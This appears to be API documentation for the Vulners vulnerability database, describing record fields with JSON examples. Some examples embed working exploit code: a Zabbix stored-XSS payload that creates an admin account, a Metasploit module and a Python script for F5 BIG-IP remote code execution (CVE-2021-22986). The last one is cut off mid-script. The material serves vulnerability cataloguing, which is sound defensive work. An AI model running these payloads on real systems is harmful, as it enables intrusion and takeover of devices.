Vulners fields¶
Vulners structures all documents as JSON records with a combination of basic fields (common to all records) and complex fields (additional logic or correlation provided by Vulners). Basic fields contain standard metadata such as the document ID, title, and publication dates, while complex fields can contain CPE configurations, advanced scoring, or references to other bulletins. This consistent structure facilitates both human and automated analysis of vulnerabilities, advisories, news articles or exploits.
In the following sections, each field is listed once, along with its meaning, type, and example usage, divided into basic and complex fields.
Basic fields¶
The Basic Fields section encompasses automatically populated fields sourced directly from specified origins. Vulners manages the display of these fields but does not assume responsibility for the accuracy or integrity of the source content.
Summary Table¶
Field Name | Description |
---|---|
id |
Unique identifier for each document or item in the database. |
type |
Vendor or source type of the bulletin (e.g., "Debian", "RedHat"). |
bulletinFamily |
Category or family of the bulletin (e.g., "Unix", "Exploit"). |
title |
Title of the bulletin providing a concise summary. |
description |
Detailed description of the bulletin's content. |
date |
Publication and modification dates of the bulletin. |
cvss |
Common Vulnerability Scoring System metrics. |
epss |
Exploit Prediction Scoring System scores for each CVE. |
href |
URL link to the source or reference of the bulletin. |
reporter |
Contributor or source information of the bulletin. |
references |
List of URLs serving as references or sources related to the bulletin. |
cvelist |
List of CVE identifiers addressed in the bulletin. |
lastseen |
Timestamp indicating the last update by the system. |
affectedSoftware |
List of software products affected by the vulnerability. |
affectedPackage |
List of specific software packages impacted by the vulnerability. |
sourceData |
Additional data for exploit or scanner bulletins (e.g., code snippets). |
bounty |
HackerOne bounty amount for responsibly disclosing the vulnerability. |
id¶
Each document or item within the database is assigned a unique identifier (id
). This identifier serves as a key to retrieve all associated fields of the document or to reference the document within your own systems.
Format: String
Examples:
"id": "WOLFI:GHSA-232P-VWFF-86MP"
"id": "CVE-2024-38077"
"id": "552C9A19-90E6-5067-8219-49E1A63A934E"
type¶
Specifies the vendor or source type of the bulletin, such as "Debian", "RedHat", "ExploitDB", "Metasploit", etc. Each bulletinFamily may encompass various types corresponding to different vendors or sources.
Format: String
Examples:
"type": "debian"
"type": "RedHat"
"type": "ExploitDB"
"type": "Metasploit"
Example link: [SECURITY] [DLA 2614-1] busybox security update
{
"result": "OK",
"data": {
"documents": {
"DEBIAN:DLA-2614-1:BDB8D": {
"id": "DEBIAN:DLA-2614-1:BDB8D",
"bulletinFamily": "unix",
"title": "[SECURITY] [DLA 2614-1] busybox security update",
"description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2614-1 [email protected]\nhttps://www.debian.org/lts/security/ Markus Koschany\nApril 01, 2021 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : busybox\nVersion : 1:1.22.0-19+deb9u2\nCVE ID : CVE-2021-28831\nDebian Bug : 986217\n\nThe gunzip decompressor of Busybox, tiny utilities for small and embedded\nsystems, mishandled the error bit on the huft_build result pointer, with a\nresultant invalid free or segmentation fault, via malformed gzip data. \n\nFor Debian 9 stretch, this problem has been fixed in version\n1:1.22.0-19+deb9u2.\n\nWe recommend that you upgrade your busybox packages.\n\nFor the detailed security status of busybox please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/busybox\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n",
"published": "2021-04-01T22:00:09",
"modified": "2021-04-01T22:00:09",
"cvss": {
"score": 5.0,
"vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
},
"href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202104/msg00001.html",
"reporter": "Debian",
"references": [],
"cvelist": [
"CVE-2021-28831"
],
"type": "debian",
"lastseen": "2021-04-02T13:19:57",
"edition": 1,
"viewCount": 33,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2021-28831"
]
},
{
"type": "fedora",
"idList": [
"FEDORA:1DC3230E9890",
"FEDORA:EA31830F7ECB",
"FEDORA:4B7BA30CB296"
]
},
{
"type": "archlinux",
"idList": [
"ASA-202103-11",
"ASA-202103-12"
]
},
{
"type": "nessus",
"idList": [
"DEBIAN_DLA-2614.NASL",
"FEDORA_2021-D20C8A4730.NASL"
]
}
],
"modified": "2021-04-02T13:19:57",
"rev": 2
},
"score": {
"value": 5.2,
"vector": "NONE",
"modified": "2021-04-02T13:19:57",
"rev": 2
},
"vulnersScore": 5.2
},
"affectedPackage": [
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "udhcpd_1:1.22.0-19+deb9u2_all.deb",
"packageName": "udhcpd",
"packageVersion": "1:1.22.0-19+deb9u2"
},
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "busybox_1:1.22.0-19+deb9u2_all.deb",
"packageName": "busybox",
"packageVersion": "1:1.22.0-19+deb9u2"
},
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "udhcpc_1:1.22.0-19+deb9u2_all.deb",
"packageName": "udhcpc",
"packageVersion": "1:1.22.0-19+deb9u2"
},
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "busybox-static_1:1.22.0-19+deb9u2_all.deb",
"packageName": "busybox-static",
"packageVersion": "1:1.22.0-19+deb9u2"
},
{
"OS": "Debian",
"OSVersion": "9",
"arch": "all",
"operator": "lt",
"packageFilename": "busybox-syslogd_1:1.22.0-19+deb9u2_all.deb",
"packageName": "busybox-syslogd",
"packageVersion": "1:1.22.0-19+deb9u2"
}
]
}
}
}
}
Example link: (RHSA-2021:0943) Moderate: Red Hat build of Eclipse Vert.x 4.0.3 security update
{
"result": "OK",
"data": {
"documents": {
"RHSA-2021:0943": {
"id": "RHSA-2021:0943",
"type": "redhat",
"bulletinFamily": "unix",
"title": "(RHSA-2021:0943) Moderate: Red Hat build of Eclipse Vert.x 4.0.3 security update",
"description": "This release of Red Hat build of Eclipse Vert.x 4.0.3 includes security updates, bug fixes, and enhancements. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* netty: Information disclosure via the local system temporary directory (CVE-2021-21290)\n\n* netty: possible request smuggling in HTTP/2 due missing validation (CVE-2021-21295)\n\nFor more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section.",
"published": "2021-03-31T13:34:13",
"modified": "2021-03-31T13:34:51",
"cvss": {
"score": 2.6,
"vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"
},
"href": "https://access.redhat.com/errata/RHSA-2021:0943",
"reporter": "RedHat",
"references": [],
"cvelist": [
"CVE-2021-21290",
"CVE-2021-21295"
],
"lastseen": "2021-03-31T10:28:30",
"viewCount": 41,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2021-21295",
"CVE-2021-21290"
]
},
{
"type": "redhat",
"idList": [
"RHSA-2021:0986"
]
},
{
"type": "github",
"idList": [
"GHSA-WM47-8V5P-WJPJ",
"GHSA-5MCR-GQ6C-3HQ2"
]
},
{
"type": "nessus",
"idList": [
"OPENSUSE-2021-448.NASL",
"DEBIAN_DLA-2555.NASL"
]
},
{
"type": "debian",
"idList": [
"DEBIAN:DLA-2555-1:DBD69"
]
}
],
"modified": "2021-03-31T10:28:30",
"rev": 2
},
"score": {
"value": 4.9,
"vector": "NONE",
"modified": "2021-03-31T10:28:30",
"rev": 2
},
"vulnersScore": 4.9
},
"affectedPackage": []
}
}
}
}
Example link: Zabbix 3.4.7 - Stored XSS
{
"result": "OK",
"data": {
"documents": {
"EDB-ID:49729": {
"id": "EDB-ID:49729",
"type": "exploitdb",
"bulletinFamily": "exploit",
"title": "Zabbix 3.4.7 - Stored XSS",
"description": "",
"published": "2021-03-31T00:00:00",
"modified": "2021-03-31T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"href": "https://www.exploit-db.com/exploits/49729",
"reporter": "Exploit-DB",
"references": [],
"cvelist": [
"CVE-2019-17382"
],
"lastseen": "2021-03-31T08:29:46",
"viewCount": 244,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2019-17382"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:162032"
]
}
],
"modified": "2021-03-31T08:29:46",
"rev": 2
},
"score": {
"value": 4.9,
"vector": "NONE",
"modified": "2021-03-31T08:29:46",
"rev": 2
},
"vulnersScore": 4.9
},
"sourceHref": "https://www.exploit-db.com/download/49729",
"sourceData": "# Exploit Title: Zabbix 3.4.7 - Stored XSS\r\n# Date: 30-03-2021\r\n# Exploit Author: Radmil Gazizov\r\n# Vendor Homepage: https://www.zabbix.com/\r\n# Software Link: https://www.zabbix.com/rn/rn3.4.7\r\n# Version: 3.4.7\r\n# Tested on: Linux\r\n\r\n# Reference -\r\nhttps://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt\r\n\r\n1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)\r\n2- Create new dashboard\r\n3- Add a new widget => Type: Map nabigation tree\r\n4- Past into parameter \"Name\": <img src=\"x\" onerror=\"var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});\">\r\n5- Click to \"Add\" button",
"osvdbidlist": []
}
}
}
}
Example link: F5 iControl REST Unauthenticated SSRF Token Generation RCE
{
"result": "OK",
"data": {
"documents": {
"MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/": {
"id": "MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/",
"type": "metasploit",
"bulletinFamily": "exploit",
"title": "F5 iControl REST Unauthenticated SSRF Token Generation RCE",
"description": "This module exploits a pre-auth SSRF in the F5 iControl REST API's /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device. This vulnerability is known as CVE-2021-22986. CVE-2021-22986 affects the following BIG-IP versions: * 12.1.0 - 12.1.5 * 13.1.0 - 13.1.3 * 14.1.0 - 14.1.3 * 15.1.0 - 15.1.2 * 16.0.0 - 16.0.1 And the following BIG-IQ versions: * 6.0.0 - 6.1.0 * 7.0.0 * 7.1.0 Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n",
"published": "2021-03-31T19:02:32",
"modified": "2021-03-31T19:02:32",
"cvss": {
"score": 0.0,
"vector": "NONE"
},
"href": "",
"reporter": "Rapid7",
"references": [],
"cvelist": [
"CVE-2021-22986"
],
"lastseen": "2021-04-01T18:34:34",
"viewCount": 19,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2021-22986"
]
},
{
"type": "attackerkb",
"idList": [
"AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E"
]
},
{
"type": "impervablog",
"idList": [
"IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F"
]
},
{
"type": "nessus",
"idList": [
"F5_BIGIP_SOL03009991.NASL"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:162066",
"PACKETSTORM:162059"
]
},
{
"type": "exploitdb",
"idList": [
"EDB-ID:49738"
]
},
{
"type": "thn",
"idList": [
"THN:D31DB501A57ADE0C1DBD12724D8CA44C",
"THN:4959B86491B72239BCAF1958D167D57D"
]
},
{
"type": "cisa",
"idList": [
"CISA:A55091A825D08BAA55750010D4193771"
]
},
{
"type": "threatpost",
"idList": [
"THREATPOST:1D03F5885684829E899CEE4F63F5AC27",
"THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:72759E1136A76135F26DD97485912606",
"RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC"
]
}
],
"modified": "2021-04-01T18:34:34",
"rev": 2
},
"score": {
"value": 6.6,
"vector": "NONE",
"modified": "2021-04-01T18:34:34",
"rev": 2
},
"vulnersScore": 6.6
},
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb",
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF in the F5 iControl REST API's\n /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that\n can be used to execute root commands on an affected BIG-IP or BIG-IQ\n device. This vulnerability is known as CVE-2021-22986.\n\n CVE-2021-22986 affects the following BIG-IP versions:\n\n * 12.1.0 - 12.1.5\n * 13.1.0 - 13.1.3\n * 14.1.0 - 14.1.3\n * 15.1.0 - 15.1.2\n * 16.0.0 - 16.0.1\n\n And the following BIG-IQ versions:\n\n * 6.0.0 - 6.1.0\n * 7.0.0\n * 7.1.0\n\n Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n },\n 'Author' => [\n 'wvu', # Analysis and exploit\n 'Rich Warren' # First blood (RCE) and endpoint collaboration\n ],\n 'References' => [\n ['CVE', '2021-22986'],\n ['URL', 'https://support.f5.com/csp/article/K03009991'],\n ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],\n ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']\n # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html\n ],\n 'DisclosureDate' => '2021-03-10', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\n ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),\n OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def username\n datastore['USERNAME']\n end\n\n def user_reference_endpoint\n normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)\n end\n\n def check\n generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@token ||= generate_token_ssrf)\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def generate_token_ssrf\n print_status('Generating token via SSRF...')\n vprint_status(\"Username: #{username}\")\n vprint_status(\"Endpoint: #{login_reference_endpoint}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\n 'ctype' => 'application/json',\n 'data' => {\n 'username' => username,\n 'bigipAuthCookie' => '',\n 'authProviderName' => 'local',\n 'loginReference' => {\n 'link' => \"https://localhost#{login_reference_endpoint}\"\n },\n 'userReference' => {\n 'link' => \"https://localhost#{user_reference_endpoint}\"\n }\n }.to_json\n )\n\n unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))\n print_error('Failed to generate token')\n return\n end\n\n print_good(\"Successfully generated token: #{@token}\")\n @token\n end\n\n def execute_command(cmd, _opts = {})\n bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\n\n print_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\n 'ctype' => 'application/json',\n 'headers' => {\n 'X-F5-Auth-Token' => @token\n },\n 'data' => {\n 'command' => 'run',\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\n }.to_json\n }, datastore['CmdExecTimeout'])\n\n unless res\n vprint_warning('Command execution timed out')\n return\n end\n\n unless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate'\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\n end\n\n print_good('Successfully executed command')\n\n return unless (cmd_result = res.get_json_document['commandResult'])\n\n vprint_line(cmd_result)\n end\n\n def login_reference_endpoint\n if datastore['ENDPOINT']\n return normalize_uri(target_uri.path, datastore['ENDPOINT'])\n end\n\n @token_generation_endpoint ||= token_generation_endpoints.sample\n\n normalize_uri(target_uri.path, @token_generation_endpoint)\n end\n\n # Usable token generation endpoints between versions 12.1.4 and 16.0.1\n def token_generation_endpoints\n %w[\n /access/file-path-manager/indexing\n /cm/autodeploy/cluster-software-images/indexing\n /cm/autodeploy/qkview/indexing\n /cm/autodeploy/software-images/indexing\n /cm/autodeploy/software-volume-install/indexing\n /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing\n /cm/system/authn/providers/tmos/indexing\n /mgmt/shared/analytics/avr-proxy-tasks\n /mgmt/shared/gossip\n /mgmt/shared/gossip-peer-refresher\n /mgmt/shared/identified-devices/config/device-refresh\n /mgmt/shared/save-config\n /mgmt/tm/shared/bigip-failover-state\n /shared/analytics/avr-proxy-tasks\n /shared/analytics/avr-proxy-tasks/indexing\n /shared/analytics/event-aggregation-tasks/indexing\n /shared/analytics/event-analysis-tasks/indexing\n /shared/authn/providers/local/groups/indexing\n /shared/authz/remote-resources/indexing\n /shared/authz/resource-groups/indexing\n /shared/authz/roles/indexing\n /shared/authz/tokens/indexing\n /shared/chassis-framework-upgrades/indexing\n /shared/device-discovery-tasks/indexing\n /shared/device-group-key-pairs/indexing\n /shared/echo/indexing\n /shared/framework-info-tasks/indexing\n /shared/framework-upgrades/indexing\n /shared/gossip\n /shared/gossip-peer-refresher\n /shared/group-task/indexing\n /shared/iapp/blocks/indexing\n /shared/iapp/build-package/indexing\n /shared/iapp/health-prefix-map/indexing\n /shared/iapp/package-management-tasks/indexing\n /shared/iapp/template-loader/indexing\n /shared/identified-devices/config/device-refresh\n /shared/nodejs/loader-path-config/indexing\n /shared/package-deployments/indexing\n /shared/resolver/device-groups/indexing\n /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing\n /shared/root-framework-upgrades/indexing\n /shared/rpm-tasks/indexing\n /shared/save-config\n /shared/snapshot-task/indexing\n /shared/snapshot/indexing\n /shared/stats-information/indexing\n /shared/storage/tasks/indexing\n /shared/task-scheduler/scheduler/indexing\n /shared/tmsh-shell/indexing\n /tm/analytics/afm-sweeper/generate-report/indexing\n /tm/analytics/afm-sweeper/report-results/indexing\n /tm/analytics/application-security-anomalies/generate-report/indexing\n /tm/analytics/application-security-anomalies/report-results/indexing\n /tm/analytics/application-security-network/generate-report/indexing\n /tm/analytics/application-security-network/report-results/indexing\n /tm/analytics/application-security/generate-report/indexing\n /tm/analytics/application-security/report-results/indexing\n /tm/analytics/asm-bypass/generate-report/indexing\n /tm/analytics/asm-bypass/report-results/indexing\n /tm/analytics/asm-cpu/generate-report/indexing\n /tm/analytics/asm-cpu/report-results/indexing\n /tm/analytics/asm-memory/generate-report/indexing\n /tm/analytics/asm-memory/report-results/indexing\n /tm/analytics/cpu/generate-report/indexing\n /tm/analytics/cpu/report-results/indexing\n /tm/analytics/disk-info/generate-report/indexing\n /tm/analytics/disk-info/report-results/indexing\n /tm/analytics/dns/generate-report/indexing\n /tm/analytics/dns/report-results/indexing\n /tm/analytics/dos-l3/generate-report/indexing\n /tm/analytics/dos-l3/report-results/indexing\n /tm/analytics/http/generate-report/indexing\n /tm/analytics/http/report-results/indexing\n /tm/analytics/ip-intelligence/generate-report/indexing\n /tm/analytics/ip-intelligence/report-results/indexing\n /tm/analytics/ip-layer/generate-report/indexing\n /tm/analytics/ip-layer/report-results/indexing\n /tm/analytics/lsn-pool/generate-report/indexing\n /tm/analytics/lsn-pool/report-results/indexing\n /tm/analytics/memory/generate-report/indexing\n /tm/analytics/memory/report-results/indexing\n /tm/analytics/network/generate-report/indexing\n /tm/analytics/network/report-results/indexing\n /tm/analytics/pem/generate-report/indexing\n /tm/analytics/pem/report-results/indexing\n /tm/analytics/proc-cpu/generate-report/indexing\n /tm/analytics/proc-cpu/report-results/indexing\n /tm/analytics/protocol-security-http/generate-report/indexing\n /tm/analytics/protocol-security-http/report-results/indexing\n /tm/analytics/protocol-security/generate-report/indexing\n /tm/analytics/protocol-security/report-results/indexing\n /tm/analytics/sip/generate-report/indexing\n /tm/analytics/sip/report-results/indexing\n /tm/analytics/swg-blocked/generate-report/indexing\n /tm/analytics/swg-blocked/report-results/indexing\n /tm/analytics/swg/generate-report/indexing\n /tm/analytics/swg/report-results/indexing\n /tm/analytics/tcp-analytics/generate-report/indexing\n /tm/analytics/tcp-analytics/report-results/indexing\n /tm/analytics/tcp/generate-report/indexing\n /tm/analytics/tcp/report-results/indexing\n /tm/analytics/udp/generate-report/indexing\n /tm/analytics/udp/report-results/indexing\n /tm/analytics/vcmp/generate-report/indexing\n /tm/analytics/vcmp/report-results/indexing\n /tm/analytics/virtual/generate-report/indexing\n /tm/analytics/virtual/report-results/indexing\n /tm/shared/bigip-failover-state\n /tm/shared/sys/backup/indexing\n ]\n end\n\nend\n",
"metasploitReliability": "",
"metasploitHistory": ""
}
}
}
}
bulletinFamily¶
Categorizes the bulletin into specific families, each with distinct attributes and fields. Examples include::
- Unix
- Exploit
- Tools
- Software
- NVD
- Microsoft
- News
- Blog
- Info
- Bugbounty
Each bulletinFamily
may have tailored fields and attributes based on its category.
Format: String
Examples:
"bulletinFamily": "Unix"
"bulletinFamily": "Exploit"
"bulletinFamily": "Info"
"bulletinFamily": "Tools"
Example link: [SECURITY] Fedora 33 Update: kernel-tools-5.11.11-200.fc33
{
"result": "OK",
"data": {
"documents": {
"FEDORA:9081130C99AB": {
"id": "FEDORA:9081130C99AB",
"type": "fedora",
"bulletinFamily": "unix",
"title": "[SECURITY] Fedora 33 Update: kernel-tools-5.11.11-200.fc33",
"description": "This package contains the tools/ directory from the kernel source and the supporting documentation. ",
"published": "2021-04-02T01:22:21",
"modified": "2021-04-02T01:22:21",
"cvss": {
"score": 0.0,
"vector": "NONE"
},
"href": "",
"reporter": "Fedora",
"references": [],
"cvelist": [
"CVE-2021-29646",
"CVE-2021-29647",
"CVE-2021-29648",
"CVE-2021-29649",
"CVE-2021-29650"
],
"lastseen": "2021-04-02T22:46:17",
"viewCount": 19,
"enchantments": {
"dependencies": {
"references": [
{
"type": "fedora",
"idList": [
"FEDORA:076F830528F3",
"FEDORA:74FD430C99A1",
"FEDORA:604C9309D33B",
"FEDORA:208C6306A247",
"FEDORA:B309B305D40A",
"FEDORA:E66B630C998B",
"FEDORA:DEF49309BE28",
"FEDORA:7A7D4309D9BC"
]
},
{
"type": "cve",
"idList": [
"CVE-2021-29646",
"CVE-2021-29649",
"CVE-2021-29647",
"CVE-2021-29650",
"CVE-2021-29648"
]
}
],
"modified": "2021-04-02T22:46:17",
"rev": 2
},
"score": {
"value": 4.7,
"vector": "NONE",
"modified": "2021-04-02T22:46:17",
"rev": 2
},
"vulnersScore": 4.7
},
"affectedPackage": [
{
"OS": "Fedora",
"OSVersion": "33",
"arch": "any",
"packageName": "kernel-tools",
"packageVersion": "5.11.11",
"packageFilename": "UNKNOWN",
"operator": "lt"
}
]
}
}
}
}
Example link: F5 BIG-IP 16.0.x Remote Code Execution
{
"result": "OK",
"data": {
"documents": {
"PACKETSTORM:162066": {
"id": "PACKETSTORM:162066",
"type": "packetstorm",
"bulletinFamily": "exploit",
"title": "F5 BIG-IP 16.0.x Remote Code Execution",
"description": "",
"published": "2021-04-02T00:00:00",
"modified": "2021-04-02T00:00:00",
"cvss": {
"score": 0.0,
"vector": "NONE"
},
"href": "https://packetstormsecurity.com/files/162066/F5-BIG-IP-16.0.x-Remote-Code-Execution.html",
"reporter": "Al1ex",
"references": [],
"cvelist": [
"CVE-2021-22986"
],
"lastseen": "2021-04-02T14:19:05",
"viewCount": 90,
"enchantments": {
"dependencies": {
"references": [
{
"type": "cve",
"idList": [
"CVE-2021-22986"
]
},
{
"type": "attackerkb",
"idList": [
"AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E"
]
},
{
"type": "impervablog",
"idList": [
"IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F"
]
},
{
"type": "nessus",
"idList": [
"F5_BIGIP_SOL03009991.NASL"
]
},
{
"type": "metasploit",
"idList": [
"MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/"
]
},
{
"type": "exploitdb",
"idList": [
"EDB-ID:49738"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:162059"
]
},
{
"type": "thn",
"idList": [
"THN:D31DB501A57ADE0C1DBD12724D8CA44C",
"THN:4959B86491B72239BCAF1958D167D57D"
]
},
{
"type": "cisa",
"idList": [
"CISA:A55091A825D08BAA55750010D4193771"
]
},
{
"type": "threatpost",
"idList": [
"THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B",
"THREATPOST:1D03F5885684829E899CEE4F63F5AC27"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC",
"RAPID7BLOG:72759E1136A76135F26DD97485912606"
]
}
],
"modified": "2021-04-02T14:19:05",
"rev": 2
},
"score": {
"value": 6.5,
"vector": "NONE",
"modified": "2021-04-02T14:19:05",
"rev": 2
},
"vulnersScore": 6.5
},
"sourceHref": "https://packetstormsecurity.com/files/download/162066/f5bigip16-exec.txt",
"sourceData": "`# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) \n# Exploit Author: Al1ex \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 \n# CVE : CVE-2021-22986 \n \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nimport sys \n \n \ndef title(): \nprint(''' \n______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ \n/ |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / / \n| ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ \n| | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\ \n| `----. \\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \n\\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/ \n \nAuthor:Al1ex@Heptagram \nGithub:https://github.com/Al1ex \n''') \n \ndef exploit(url): \ntarget_url = url + '/mgmt/shared/authn/login' \ndata = { \n\"bigipAuthCookie\":\"\", \n\"username\":\"admin\", \n\"loginReference\":{\"link\":\"/shared/gossip\"}, \n\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"} \n} \nheaders = { \n\"User-Agent\": \"hello-world\", \n\"Content-Type\":\"application/x-www-form-urlencoded\" \n} \nresponse = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) \nif \"/mgmt/shared/authz/tokens/\" not in response.text: \nprint('(-) Get token fail !!!') \nprint('(*) Tested Method 2:') \nheader_2 = { \n'User-Agent': 'hello-world', \n'Content-Type': 'application/json', \n'X-F5-Auth-Token': '', \n'Authorization': 'Basic YWRtaW46QVNhc1M=' \n} \ndata_2 = { \n\"command\": \"run\", \n\"utilCmdArgs\": \"-c whoami\" \n} \ncheck_url = url + '/mgmt/tm/util/bash' \ntry: \nresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) \nif response2.status_code == 200 and 'commandResult' in response2.text: \nwhile True: \ncmd = input(\"(:CMD)> \") \ndata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)} \nr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) \nif r.status_code == 200 and 'commandResult' in r.text: \nprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', '')) \nelse: 